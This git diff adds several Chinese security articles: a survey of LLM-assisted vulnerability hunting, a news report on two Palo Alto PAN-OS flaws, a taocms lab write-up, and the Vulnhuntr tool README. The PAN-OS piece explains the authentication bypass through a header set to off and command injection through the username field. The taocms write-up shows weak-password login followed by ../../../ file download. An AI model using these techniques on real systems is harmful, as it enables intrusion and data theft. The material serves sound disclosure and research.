+![](https://mmbiz.qpic.cn/mmbiz_png/9EP6QFMcTmTPnokZZ8YNRXaUloc6lVf1ia4fM2g8CSqqCNeiaINxdCjia45uqyiavL5rv8iaGjxz8umWGYblK6SPZpw/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + +图片来源:Introduction to Retrieval-Augmented Generation (RAG) and its Transformative Role in AI + + +RAG(检索增强生成)是一种用于强化 Few-shot Prompting 的技术,RAG 方法会从训练集中检索与目标测试数据样本相似的标记数据样本,并将这些检索到的样本用作示例,指导大模型对目标数据进行预测。例如,一些工作预先生成包含漏洞代码示例的数据库,在目标函数检测时,通过相似性分析在数据库中检索与目标函数相似的漏洞函数,作为示例一起提供给大模型。 + +**05** + +**提示工程:部分示例** + + +本小节让我们一起来看一下 github 上的一些热门辅助工具都使用了哪些 Prompt 工程的技巧? + + +[WPeChatGPT]() + (⭐ 1K ) 是一个帮助分析二进制程序的 IDA 插件,可以很方便的让 GPT 分析反编译生成的伪代码。但它内置的提示词只有非常朴素的一句话,实在是还有提升空间。 + +![](https://mmbiz.qpic.cn/mmbiz_png/9EP6QFMcTmTPnokZZ8YNRXaUloc6lVf1nrI7xKcsxuO5PVxrF3qIGoe04GgEkrZd1ciawb9ia3QbeKXNGhPPoydg/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + +[ChatWithBinary]() + (⭐ 300) 被设计用来解决简单的 CTF 比赛,可以看到这个工具所使用的 Prompt 中运用到了一些角色扮演和任务描述的零次提示技巧。 + +![](https://mmbiz.qpic.cn/mmbiz_png/9EP6QFMcTmTPnokZZ8YNRXaUloc6lVf1VP85b4ic3QlfbPBqE1aHonJX7E20rAB1zf6ed4Kl9ZJ3LiaqtGgVAIug/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + +[vulnhuntr]() + (⭐ 1K)是 ProtectAI 近期开源的一个用于挖掘 python 代码仓库的工具,它针对多种类型的漏洞进行了优化,例如在针对 RCE 漏洞进行挖掘的时候,会额外给出关于漏洞的相关的详细描述,以及给出一些绕过校验的例子来帮助 LLM 判断代码中的输入校验是否可以绕过。 + +![](https://mmbiz.qpic.cn/mmbiz_png/9EP6QFMcTmTPnokZZ8YNRXaUloc6lVf1VPLXqoeUYkRlSX4SB9yAEgTDurGic3jINnGzJjpiauxeTvwCJFYWgxWQ/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + +**06** + +**我们还有多远?** + + +上面提到的各种方法都在自己的实验结果中表现良好,但实际应用情况如何?[S&P 2024 上的一项工作]() +,对 228 个代码场景下 8 个先进 LLM 进行评估,涵盖了 C 和 Python 中的 8 种关键的漏洞。结果显示:LLM 的性能因所使用的模型和提示技术而异,说明不同的方法的确能给 LLM 带来不同的程度的性能提升,但研究也发现以下问题: +1. 所有分析的模型都有很高的误报率,并且标记了已修补漏洞的代码仍然易受攻击; + +1. LLM 的输出是不确定的,所有模型都会在一次或多次测试中多次运行并改变答案; + +1. 即使它们正确识别了漏洞,LLM 为此决定提供的推理解释也往往是不正确的,这让人对其可信度产生质疑; + +1. LLM 思维链推理不够稳健,即使是简单的代码扩充也可能会使其混淆; + +1. LLM 无法(难以)检测实际项目中的漏洞。 + +结论是:即使是最先进的大模型目前也尚未完全准备好用于实际的漏洞检测。尽管目前的结果不尽如人意,但大模型在代码理解方面展现出了非凡潜力,随着近期大模型推理能力的进一步提升,其有望在漏洞检测领域有更显著的进步。 + +**三** + + +**代码库级别漏洞检测** + + +相较于函数级别的研究专注于提升大模型直接的漏洞检测能力,代码库级别的研究则更侧重从架构层面进行改进。随着具备更高输入长度容量的 LLM 的出现,存储库级漏洞检测方法作为挖掘现实漏洞不可回避的研究问题,也受到越来越多的关注。 + +**01** + +**相关学术研究** + + +截至本文撰写时,我没有找到太多专注于解决代码库级别漏洞检测的研究。不过,在前面提到的研究中,有一些相关的学术工作也值得借鉴和学习。 + + +![](https://mmbiz.qpic.cn/mmbiz_png/9EP6QFMcTmTPnokZZ8YNRXaUloc6lVf1XiaicPVORqr8hkk6fmTdibicpmNkIC8tABuabZUibbl0ZhtXZsZlIDm2JOA/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + +图片来源:VulEval: Towards Repository-Level Evaluation of Software Vulnerability Detection + + +该研究提出了一种名为 [VulEval]() + 的评估系统,旨在同时评估软件漏洞检测方法在函数级和代码库级的性能,为此设计了一种简单的代码库级别漏洞检测方法,其本质属于 RAG 方法,主要包含以下步骤: +- 依赖数据库构建:首先使用静态分析工具从补丁文件中提取与漏洞相关的调用者和被调用者信息构建依赖知识数据库; + +- 漏洞依赖函数预测:针对输入的代码片段,检索器能够提取其调用的被调用者和调用者信息,基于依赖数据库计算输入代码与每个候选依赖之间的漏洞相关性得分,最终返回最相关的几个依赖函数; + +- 代码库级别漏洞检测:最后,检测器使用检索器返回与目标函数相关的依赖函数,然后将这些依赖函数作为上下文与目标函数代码片段一起输入检测器,实现跨函数漏洞的检测。 + + + + +![](https://mmbiz.qpic.cn/mmbiz_png/9EP6QFMcTmTPnokZZ8YNRXaUloc6lVf132sklUgyIcvkmb0KYj9FryUKo854JbD2HhyKq6Q8f1CdWnEQmgzR3w/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + +图片来源:LLM-Assisted Static Analysis for Detecting Security Vulnerabilities + + +传统静态分析工具本身更适用于代码库级别的分析,[第二个例子]() +实际上是 LLM 辅助静态程序分析。该工作首先分析了传统静态分析工具的缺点:例如 CodeQL 虽然可以有效追踪复杂代码库的污点数据流,但手动编写规范既耗费人力,又容易产生误报,增加开发者负担。 + + +研究提出使用 LLM 来应对这些挑战:首先,利用 LLM 推断特定于项目和漏洞的查询语句;其次,将检测到的代码路径及其周围上下文编码为简单提示,通过 LLM 过滤误报。 + + +此处打个广告:破壳平台([poc.qianxin.com]() +)是由天工实验室推出的二进制漏洞分析工具,使用 VQL(Vulnerability Query Language)作为漏洞查询语言,而 VQL 恰好是很好的接口,可以作为 GPT 和程序的桥梁。 + +**02** + +**第一个开源方案:Vulnhuntr** + + +![](https://mmbiz.qpic.cn/mmbiz_png/9EP6QFMcTmTPnokZZ8YNRXaUloc6lVf1cdY75xbU21aPZEib57GsfAQ3nM6JELtX96DmtavvIXueiaohica14145g/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + +图片来源: +参考链接[2] + + +除了学术界的研究,开源社区近期也推出了一个基于 LLM 的漏洞挖掘工具 [Vulnhuntr]() + [2],号称发现了全球第一个由自主人工智能发现的 0day 漏洞。 + + +通过给予大模型主动请求代码库函数的能力,Vulnhuntr 能自动创建和分析从用户输入到服务器输出的完整代码调用链,并识别多种漏洞类型的多步骤复杂漏洞。可以通过阅读其源码简要了解工具的运行流程,其分析主要分为以下几个阶段: +1. Preparation:工具首先利用项目的 README 来初始化 system Prompt,结合了角色扮演、漏洞信息、思维链提示以及格式化输出等 Prompt 优化技巧; + +1. Initial Analysis:对输入的文件进行初步分析,要求大模型识别可能的用户输入 source 点和各种漏洞类型对应的 sink 点,并对所有漏洞类型进行分析。最后,模型会返回潜在的漏洞类型列表; + +1. Secondary Analysis:根据初始分析中得到的每种潜在漏洞类型,工具要求大模型进一步进行漏洞扫描、代码路径分析和安全控制分析。Prompt 中提供了特定漏洞类型的详细说明,并要求大模型在 source 点到 sink 点的逻辑链条不完整时,主动请求缺失的代码上下文; + +1. Final Report:大模型被要求给出发现的所有漏洞的详细信息、详细的推理过程和 PoC 以及置信分数。作者表示置信分数超过 7 的结果通常意味着潜在漏洞可能性较大。 + + +作者在 GitHub 上公布了部分由 Vulnhuntr 发现的漏洞列表,看起来躺着挖洞的梦想就快要成为现实(等等,我又失业了)。不过目前该工具只支持检测 python 代码库中的漏洞,考虑到工具的框架与语言类型并无强关联,感兴趣的读者可以尝试将其扩展到其他编程语言。 + + +

Repository

Stars

Vulnerabilities

gpt_academic

64k

LFI, XSS

ComfyUI

50k

XSS

FastChat

35k

SSRF

REDACTED

29k

RCE, IDOR

REDACTED

20k

SSRF

Ragflow

16k

RCE

REDACTED

19k

AFO

REDACTED

12k

AFO, IDOR

+ +**四** + + +**未来研究方向** + + +**01** + +**工具集** + + +社区中还有一些尚未公开源码的研究,讨论了一种颇具潜力的端到端框架:通过提供包含静态和动态分析的工具集,让大模型能像人类研究人员一样使用工具来识别和分析漏洞。 + + +![](https://mmbiz.qpic.cn/mmbiz_png/9EP6QFMcTmTPnokZZ8YNRXaUloc6lVf16lxcU62sicGvVS6QyHJd0Nqw8fiaPp700iaBQH4snPia9wKdQr68h3QgMg/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + +图片来源:参考链接[4] + + +[Naptime]() + [4] 由谷歌于今年 6 月提出,通过集成代码浏览器、Python 工具和调试器等组件,使 AI 代理能够模拟人类安全研究人员的工作流程,自动识别和分析代码中的漏洞。 +- **代码浏览工具** +使代理能够浏览目标代码库,为 LLM 提供了查看函数源代码、识别引用函数位置的功能; + +- **Python 工具** +使代理能够运行 Python 脚本以进行中间计算,为目标程序生成精确且复杂的输入; + +- **调试器工具** +是最巧妙的部分,它使代理能够与程序交互并观察其在不同输入下的行为。支持设置断点并在这些断点处计算表达式,从而实现动态分析。众所周知动态分析可以很好弥补静态分析假阳性过高的问题。 + + + + +![](https://mmbiz.qpic.cn/mmbiz_png/9EP6QFMcTmTPnokZZ8YNRXaUloc6lVf1AA9kBias177Baulo6OBw8AFhicicoeRs0bv9LeMj4Wvj45y8tibQTl70aw/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + + +在去年开始的[人工智能网络挑战赛]() +(AIxCC) 中,参赛者被要求开发利用大语言模型自动查找和修复大规模漏洞的工具。挑战项目以现实世界的开源项目为基础:Jenkins、Linux 内核、Nginx、SQLite3 和 Apache Tika。 + + +[Team Atlanta]() + [3] 在 8 月于 DEFCON上举行的 AIxCC 半决赛中使用他们的工具发现了 SQLite3 中一个以前未知的空指针解引用,由于比赛尚未完全结束,目前尚无法了解该工具的具体代码实现细节(AIxCC 要求赛后开源工具)。但从他们的博客上可以知道 Team Atlanta 也使用了传统的思维链和微调等技术来增强模型的能力,同时他们在文章中表达了和谷歌研究团队相似的观点: + +> 我们的设计理念很简单:通过 LLM 代理模拟经验丰富的安全研究人员和黑客的思维方式,并通过先进的程序分析技术(动态和静态)进行增强。 + + + + + +有趣的是 Team Atlanta 近期宣布将开始使用他们的工具来尝试完成一些 CTF 挑战。 + + +![](https://mmbiz.qpic.cn/mmbiz_png/9EP6QFMcTmTPnokZZ8YNRXaUloc6lVf1HYH78JewKvoYuqIT9vV2UPUv1nLlNtMxILXVqDYib4OQgibicAKNVB89g/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + + +上周,Project Zero 又发表了一篇[重磅文章]() + [5],称他们受到了 Team Atlanta 在 AIxCC 半决赛比赛中的表现启发,也对 SQLite3 进行了测试,并发现了第一个由大模型代理发现的可利用内存漏洞。 + +值得一提的是,Big Sleep 的一个关键推动因素是不断在野外发现已知漏洞的变体,研究员认为模糊测试无法很好得捕捉这些变体漏洞,而 LLM 在包含相似语义的漏洞变体分析方面具有显著优势。 + +文章最精彩的部分在于详细描述了 Big Sleep 如何结合动态调试器等工具,逐步完善漏洞推理的过程。强烈推荐阅读 Project Zero 的原始博客,以下是关键步骤的简要总结: +1. 漏洞模式学习:首先,Agent 从某次更新的补丁文件中学习得到了关于“index 错误使用”相关的漏洞信息,并提取出可能涉及漏洞的关键函数; + +1. 初步变种分析:借助代码浏览工具,Agent 在探索与漏洞相关的代码后,形成了关于该漏洞变体的假设,并尝试运行修改后的测试样例以验证其想法。然而,由于补丁依赖配置中不可用的扩展,调试器遇到了运行时错误,并输出了相关错误信息; + +1. 进一步分析验证:Agent 从调试器的报错信息中识别出运行失败的具体原因,随后通过分析代码库,学习如何创建一个能够到达目标函数的测试用例; + +1. 漏洞根因分析:最终,Agent 使用修改后的测试用例成功触发了崩溃。通过与调试器交互来获得崩溃现场的详细信息,Agent 生成了漏洞的根本原因分析及完整的崩溃报告。 + + + + +![](https://mmbiz.qpic.cn/mmbiz_jpg/9EP6QFMcTmTPnokZZ8YNRXaUloc6lVf1tPIPDdHI42TF3EsgsMmfUtDr6XJUjuZW38HJDztzDpnpRav2ZIEbYg/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + +图片来源:参考链接[5] + + +这种端到端自动化的漏洞发现过程令人兴奋。然而,考虑到谷歌尚未公布大量由该研究发现的漏洞(这与高度自动化工作能够迅速挖掘漏洞的直觉相悖),可以推测该研究方法在实际应用中仍面临许多现实挑战。 + + +此外在文章中作者也给出了对于 Fuzz 这个漏洞的看法:首先,由于 OSS-Fuzz 中的配置没有开启,所以无法检测到这个漏洞。此外,由于该漏洞不受益于代码覆盖率,并且 AFL 对文本输入的突变不够有效,作者没有能够在短时间内用 AFL 捕捉到这个浅显的漏洞。毕竟模糊测试的一大局限就是不管漏洞多么简单明了,无法到达就无法发现。 + +**02** + +**多代理** + + +Multi-agents 方法是一种利用多个代理协作或竞争来提高模型整体性能的技术,这些代理可以是同一个大语言模型的不同实例,也可以是多种专门训练的模型,各自承担不同任务,通过协作、竞争、对话等方式解决复杂问题。 + + +![](https://mmbiz.qpic.cn/mmbiz_png/9EP6QFMcTmTPnokZZ8YNRXaUloc6lVf1kZ1tqqu6l5PFvhkFibUaxqvdMjaaLLaicsdRZ8WHvswLFs8keibDzicRZw/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + +图片来源 +:DEF CON 32 - The Rise and Fall of Binary Exploitation + + +上图是一个关于“自动从补丁文件中学习得到 PoC”过程的多代理设计示例,我们也可以照猫画虎来简单设计一个多代理的漏洞挖掘方案: +- Reverse Agent + +- 输入:二进制文件 + +- 活动:逆向程序逻辑,识别 souce 和 sink 点,识别易受攻击的函数和路径 + +- 输出:易受攻击的函数或路径等 + +- Pwn Agent + +- 输入:易受攻击的函数或路径等 + +- 活动:基于上下文进行漏洞分析 + +- 输出:种子(未验证的 PoC)和漏洞摘要 + +- Fuzz Agent + +- 输入:种子(未验证的 PoC)和漏洞摘要 + +- 活动:生成 harness 并使用种子进行模糊测试 + +- 输出:PoC 文件 + +然而,在具体实现一个 multi-agent 框架时会面临更多现实问题。天工实验室的安全研究员在早期研究中对类似架构进行了初步尝试,也遇到了一些挑战,例如出现一个代理输出的内容无法被另一个代理正确解析;代理之间经过多轮交流后容易进入一些“死角”等问题。目前关于这一领域的公开研究较少,尚有许多问题未被系统性地探索和解决。 + +**五** + + +**总  结** + + +受限于大模型本身的限制,直接利用其对漏洞(特别是代码库级别)进行有效检测仍存在挑战。然而,社区中的一些工作也表明,如何构建一个框架,使得大模型能够像( +替代 +)人类研究员一样使用工具、协作去挖掘真实目标的漏洞,是一个非常有前景的发展方向。 + + +今年 DataCon 的漏洞分析赛道要求选手使用大模型来检测程序中的漏洞,其中许多赛题是由二进制文件反编译生成的代码,伪代码丢失了大量原始语义,为检测过程带来了更大的挑战!期待看到选手们带来创新性的解决方案。 + +**六** + + +**参考链接** + + +1. [Large Language Model for Vulnerability Detection and Repair: Literature Review and the Road Ahead]() + + +2. [https://github.com/protectai/vulnhuntr]() + + +3. [Autonomously Uncovering and Fixing a Hidden Vulnerability in SQLite3 with an LLM-Based System]() + + + +4.  +[Project Naptime: Evaluating Offensive Security Capabilities of Large Language Models]() + + +5.  +[From Naptime to Big Sleep: Using Large Language Models To Catch Vulnerabilities In Real-World Code]() + + + + +【版权说明】 + +本作品著作权归**eeuk** +所有 + +未经作者同意,不得转载 + +![](https://mmbiz.qpic.cn/mmbiz_png/9EP6QFMcTmTPnokZZ8YNRXaUloc6lVf1oT5WW70PxedVib5VDKNcdyEqHpVV10wZYOXFZfvX3oOibp2RQGvrpbvQ/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + +**eeuk** + + +奇安信天工实验室安全研究员 + +研究领域:IOT安全、二进制漏洞挖掘 + diff --git a/doc/Palo Alto Networks零日防火墙漏洞是由开发人员的基本错误导致的.md b/doc/Palo Alto Networks零日防火墙漏洞是由开发人员的基本错误导致的.md new file mode 100644 index 00000000..c8ae494b --- /dev/null +++ b/doc/Palo Alto Networks零日防火墙漏洞是由开发人员的基本错误导致的.md @@ -0,0 +1,109 @@ +# Palo Alto Networks零日防火墙漏洞是由开发人员的基本错误导致的 +原创 Lucian Constanti 信息安全D1net 2024-11-20 08:52 + +点击上方“**蓝色字体**”,选择 “**设为星标**” + +关键讯息,D1时间送达! + +Palo Alto Networks防火墙近期被发现存在两个严重漏洞,攻击者可利用这两个漏洞组合,通过PAN-OS管理Web界面绕过身份验证并提升权限,最终获得root权限,完全控制设备。第一个漏洞(CVE-2024-0012)允许攻击者绕过身份验证,第二个漏洞(CVE-2024-9474)则是一个命令注入漏洞,可提升权限至root。目前,Palo Alto已发布修复程序,并建议管理员更新防火墙版本,同时限制管理界面访问权限。安全公司watchTowr的研究人员指出,这些漏洞源于开发过程中的基本错误,并提醒将PAN-OS管理界面暴露在互联网上极为危险。 + + +攻击者正在利用两个漏洞的组合,通过PAN-OS管理Web界面绕过身份验证并提升权限,从而在Palo Alto Networks防火墙上获得root权限。 + +Palo Alto Networks已为其防火墙和虚拟安全设备发布了两个正在被积极利用的漏洞的修复程序。当这两个漏洞同时存在时,攻击者可以在底层的PAN-OS操作系统上以最高权限执行恶意代码,从而完全控制设备。 + +Palo Alto本月早些时候发布了一份咨询报告,警告客户其正在调查有关PAN-OS基于Web的管理界面中存在潜在远程代码执行(RCE)漏洞的报告,并建议客户遵循推荐的步骤来确保对该界面的安全访问。 + +在调查过程中,该公司发现这次RCE攻击并非由单一漏洞导致,而是由两个漏洞共同造成。这两个漏洞都已在针对管理界面暴露在互联网上的设备的有限攻击中被利用。 + +**身份验证绕过和权限提升** + +第一个漏洞(CVE-2024-0012)被评为严重级别,评分为10分中的9.3分。通过利用此漏洞,攻击者可以绕过身份验证并获得管理界面的管理权限,从而执行管理操作并更改配置。 + +尽管这已经很糟糕,但它并不会直接导致整个系统被攻陷,除非这一功能能被用来在底层操作系统上执行恶意代码。 + +事实证明,攻击者通过第二个漏洞(CVE-2024-9474)找到了这样一种方法,该漏洞允许任何拥有Web界面管理权限的人以root身份(即最高权限)在基于Linux的操作系统上执行代码。 + +这两个漏洞均影响PAN-OS 10.2、PAN-OS 11.0、PAN-OS 11.1和PAN-OS 11.2版本,目前这些版本都已获得补丁。 + +**漏洞源于疏忽** + +来自安全公司watchTowr的研究人员对Palo Alto的补丁进行了逆向工程,以分析这两个漏洞,并得出结论认为,这些漏洞是开发过程中基本错误的结果。 + +为了验证用户访问页面是否需要身份验证,PAN OS管理界面会检查请求的X-Pan-Authcheck标头是否设置为on或off。将请求转发到托管Web应用的Apache服务器的Nginx代理服务器会根据请求的路由自动将X-Pan-Authcheck设置为on。在某些情况下,由于位置(例如/unauth/目录)应无需身份验证即可访问,因此X-Pan-Authcheck被设置为off,但除了/unauth/之外,几乎所有其他位置都应将该标头设置为on,这应导致用户被重定向到登录页面。 + +然而,watchTowr研究人员发现,一个名为uiEnvSetup.php的重定向脚本期望HTTP_X_PAN_AUTHCHECK的值被设置为off,如果请求中提供了这个值,服务器就会接受它。 + +“我们只需……在X-PAN-AUTHCHECK HTTP请求标头中提供off值,服务器就会贴心地关闭身份验证?!”研究人员在报告中写道,“到了这一步,还有谁会感到惊讶呢?” + +第二个漏洞同样源于疏忽,它是一个命令注入漏洞,允许将shell命令作为用户名传递给名为AuditLog.write()的函数,然后该函数将注入的命令传递给pexecute()。但根据研究人员的说法,传递给这个日志函数的负载实际上是另一个功能的结果,而这个功能本身也相当可怕。 + +该功能允许Palo Alto Panorama设备指定其希望模拟的用户和用户角色,然后无需提供密码或通过双因素身份验证即可为其获得完全认证的PHP会话ID。 + +综上所述,由于这种软件设计,攻击者可以将shell负载作为用户名字段的一部分来模拟特定用户和角色,然后该负载将被传递给AuditLog.write(),接着传递给pexecute(),最终在底层操作系统上执行。 + +“令人惊讶的是,这两个漏洞竟然出现在生产设备中,更令人惊讶的是,它们竟然通过Palo Alto设备底层潜伏的大量shell脚本调用而被允许存在,”研究人员在分析中写道。 + +**缓解措施** + +除了将受影响的防火墙更新到最新发布的版本外,管理员还应将管理界面的访问权限限制为仅受信任的内部IP地址。管理界面也可以被隔离在专用的管理VLAN上,或者可以配置为通过所谓的跳转服务器访问,这些服务器需要先进行单独的身份验证。 + +将PAN-OS管理界面暴露在互联网上是非常危险的,因为这不是在此类设备中发现的第一个,也不太可能是最后一个RCE漏洞。今年早些时候,Palo Alto Networks修补了PAN-OS中的一个零日RCE漏洞(CVE-2024-3400),该漏洞被国家支持的黑客组织利用过。 + +Palo Alto Networks的威胁追踪团队正在追踪CVE-2024-0012和CVE-2024-9474的利用活动,并将其命名为Operation Lunar Peak,同时发布了与之相关的入侵指标。 + +“这次活动主要源自已知为匿名VPN服务代理/隧道流量的IP地址,”该团队表示,“观察到的后利用活动包括交互式命令执行和在防火墙上投放恶意软件,如Webshell。” + +版权声明:本文为企业网D1Net编译,转载需在文章开头注明出处为:企业网D1Net,如果不注明出处,企业网D1Net将保留追究其法律责任的权利。 + +![](https://mmbiz.qpic.cn/mmbiz_gif/tkEdnxs9SCm4omlQHkJibq3BQ31wdl2LzWkk2OtH0W7KKy9NeMGnKOa4wiabH53URyyFcsibKw0YFC5NankuuMcOg/640?wx_fmt=gif&from=appmsg&wxfrom=5&wx_lazy=1&tp=webp "") + + + +**2024全国甲方IT选型大会 将于11月29-30日在南京盛大召开,欢迎您扫描下方二维码报名↓↓↓。** + +**** +![](https://mmbiz.qpic.cn/mmbiz_jpg/01wTAnj9dLfp8QeodicQHA40MuBz8OpZZ7beuE15HFoWGkclGvFicXOBoo0Cfx6fWvVOd5npj5NaE9fNBVnU2YKw/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + + + +(来源:企业网D1Net) + +**关于企业网D1net(www.d1net.com)** + + + + +国内主流的to B IT门户,同时在运营国内最大的甲方CIO专家库和智力输出及社交平台-信众智(www.cioall.com)。旗下运营19个IT行业公众号( +微信搜索D1net即可关注) + + + +如果您在企业IT、网络、通信行业的某一领域工作,并希望分享观点,欢迎给企业网D1Net投稿。 +封面图片来源于摄图网 + +**投稿邮箱:** + +editor@d1net.com + +**合作电话:** + +010-58221588(北京公司) + +021-51701588(上海公司)  + +**合作邮箱:** + +Sales@d1net.com + +企业网D1net旗下信众智是CIO(首席信息官)的专家库和智力输出及资源分享平台,有五万多CIO专家,也是目前最大的CIO社交平台。 + + +信众智对接CIO为CIO服务,提供数字化升级转型方面的咨询、培训、需求对接等落地实战的服务。也是国内最早的toB共享经济平台。同时提供猎头,选型点评,IT部门业绩宣传等服务。 + +**扫描 “** +**二维码** +**” 可以查看更多详情** + +![](https://mmbiz.qpic.cn/mmbiz_png/OuQdh6iaViaXaIOY0mjrTgicElErUqymD4icjEneq6YYVpiadU3pDLRHwqFrW9Y2Ht0uKeuIEjO3hDxfiatbI5KcibHIA/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + diff --git a/doc/taocms 3.0.1 本地文件泄露漏洞(CVE-2021-44983).md b/doc/taocms 3.0.1 本地文件泄露漏洞(CVE-2021-44983).md new file mode 100644 index 00000000..63e99c9c --- /dev/null +++ b/doc/taocms 3.0.1 本地文件泄露漏洞(CVE-2021-44983).md @@ -0,0 +1,30 @@ +# taocms 3.0.1 本地文件泄露漏洞(CVE-2021-44983) +原创 張童學 Nick安全 2024-11-20 07:54 + +### 0x01、漏洞环境 + +1、春秋云境: +http://eci-2zecoe6tugruhx5kvq29.cloudeci1.ichunqiu.com:80 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/iauPABibqVzA7lgoUheOicnHk9wIgyF90662KfbKpU2URico3UaicC9tibJ8xXVhtRiahvXY1MLxEbNjYfl4n2gHSGchA/640?wx_fmt=png&from=appmsg "") +### 0x02、漏洞介绍 + +1、taocms 3.0.1 登陆后台后文件管理处存在任意文件下载漏洞。 +### 0x03、漏洞复现 + +1、点击管理跳转到后台界面。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/iauPABibqVzA7lgoUheOicnHk9wIgyF9066jIRxaRKecueu7oqHuCY70fr2WLb0HxNCC3lj6g2MRs5SWmTUhvJZzw/640?wx_fmt=png&from=appmsg "") + +2、查看管理界面源码存在弱口令。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/iauPABibqVzA7lgoUheOicnHk9wIgyF9066LYGxHITfQv1CyGYKiacjRelib3RAIzsYBndVlOm0441yuXicj5U1odsWw/640?wx_fmt=png&from=appmsg "") + +3、打开文件管理访问../../../下载flag + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/iauPABibqVzA7lgoUheOicnHk9wIgyF9066oRkgPPcQdQKbGqBM2I8K8A43QvV25pKFibq6rJ6iclCd9UBSV33icARZA/640?wx_fmt=png&from=appmsg "") +### 0x04、修复建议 + +1、为了防止这种攻击,建议升级到Taocms最新版本,或者对系统进行安全加固,例如限制文件下载权限,设置文件下载白名单等。同时,对于所有用户来说,密码安全也是非常重要的,强烈建议定期更换复杂且不易被猜测的密码。 + + diff --git a/doc/vulnhuntr:基于大语言模型和静态代码分析的漏洞扫描与分析工具.md b/doc/vulnhuntr:基于大语言模型和静态代码分析的漏洞扫描与分析工具.md new file mode 100644 index 00000000..460d8791 --- /dev/null +++ b/doc/vulnhuntr:基于大语言模型和静态代码分析的漏洞扫描与分析工具.md @@ -0,0 +1,314 @@ +# vulnhuntr:基于大语言模型和静态代码分析的漏洞扫描与分析工具 +Alpha_h4ck FreeBuf 2024-11-20 11:27 + +![](https://mmbiz.qpic.cn/mmbiz_gif/oQ6bDiaGhdyoFWEgZIHic7sqnootFEuOic7RlQNGhKY6d2ZESG3WpiaTMRlD0z4xO6mQrTZjkWHCkMpO2QtCfUJH6g/640?wx_fmt=gif&from=appmsg&wxfrom=5&wx_lazy=1&tp=webp "") + + +**关于vulnhuntr** + + +## vulnhuntr是一款基于大语言模型和静态代码分析的安全漏洞扫描与分析工具,该工具可以算得上是世界上首款具备自主AI能力的安全漏洞扫描工具。 + + +![](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR38ov3d9VSRwd5RjPw2H7uhHIVyyIG7Mg3JcjcfGqibqOcH9iaRjHmWicuEZV1tdABRVQzsicXmicxaNXRA/640?wx_fmt=jpeg&from=appmsg "") + + +Vulnhuntr 利用 LLM 的强大功能自动创建和分析整个代码调用链,从远程用户输入开始,到服务器输出结束,以检测复杂的、多步骤的和严重影响安全的漏洞,而这些漏洞,远远超出了传统静态代码分析工具的能力。 +## + +**功能介绍** + +## + + +当前版本的vulnhuntr支持检测和识别以下漏洞类别: +> 1、本地文件包含(LFI) +> 2、任意文件覆盖(AFO) +> 3、远程代码执行(RCE) +> 4、跨站点脚本(XSS) +> 5、SQL 注入(SQLI) +> 6、服务器端请求伪造(SSRF) +> 7、不安全的直接对象引用(IDOR) + +## + +**工具执行逻辑** + +## + +![](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR38ov3d9VSRwd5RjPw2H7uhHJ5lBnhFnvgqtu2GjTdP4fMEDeH6f4THJctJW2W1VaL4oMU10QVfpNA/640?wx_fmt=jpeg&from=appmsg "") +## + +**工具要求** + + +## +> Python v3.10 + +## + +**工具安装** + + +## + +由于该工具基于Python 3.10开发,因此我们首先需要在本地设备上安装并配置好Python 3.10环境。我们建议使用pipx或 Docker 轻松安装和运行 Vulnhuntr。 +### +### Docker安装 +``` +``` +``` +docker build -t vulnhuntr https://github.com/protectai/vulnhuntr.git#main +``` +``` +``` +### pipx安装 +``` +``` +``` +pipx install git+https://github.com/protectai/vulnhuntr.git --python python3.10 +``` +``` +``` +### 源码安装 + +****``` +``` +``` +git clone https://github.com/protectai/vulnhuntr + +cd vulnhuntr && poetry install +``` +``` +``` + +**工具使用** + + +``` +``` +``` +usage: vulnhuntr [-h] -r ROOT [-a ANALYZE] [-l {claude,gpt,ollama}] [-v] + + + +Analyze a GitHub project for vulnerabilities. Export your ANTHROPIC_API_KEY/OPENAI_API_KEY before running. + + + +options: + + -h, --help 显示工具帮助信息和退出 + + -r ROOT, --root ROOT 项目根目录的路径 + + -a ANALYZE, --analyze ANALYZE + + 项目中要分析的特定路径或文件 + + -l {claude,gpt,ollama}, --llm {claude,gpt,ollama} + + 要使用的LLM客户端(默认:claude) + + -v, --verbosity 增加输出的详细程度(-v表示INFO,-vv表示DEBUG) + +``` +``` +``` + +**工具运行演示** + + +## 使用 Claude 分析整个存储库: +``` +export ANTHROPIC_API_KEY="sk-1234" + +vulnhuntr -r /path/to/target/repo/ +``` + + +使用 GPT-4o 分析文件,也可以指定子目录而不是文件: +``` +export OPENAI_API_KEY="sk-1234" + +vulnhuntr -r /path/to/target/repo/ -a server.py -l gpt +``` + + +使用 Claude 和自定义端点运行来分析 /local/path/to/target/repo/repo-subfolder/target-file.py: +``` +``` +``` +docker run --rm -e ANTHROPIC_API_KEY=sk-1234 -e ANTHROPIC_BASE_URL=https://localhost:1234/api -v /local/path/to/target/repo:/repo vulnhuntr:latest -r /repo -a repo-subfolder/target-file.py +``` +``` +``` +### 输出样例 +``` +scratchpad: + 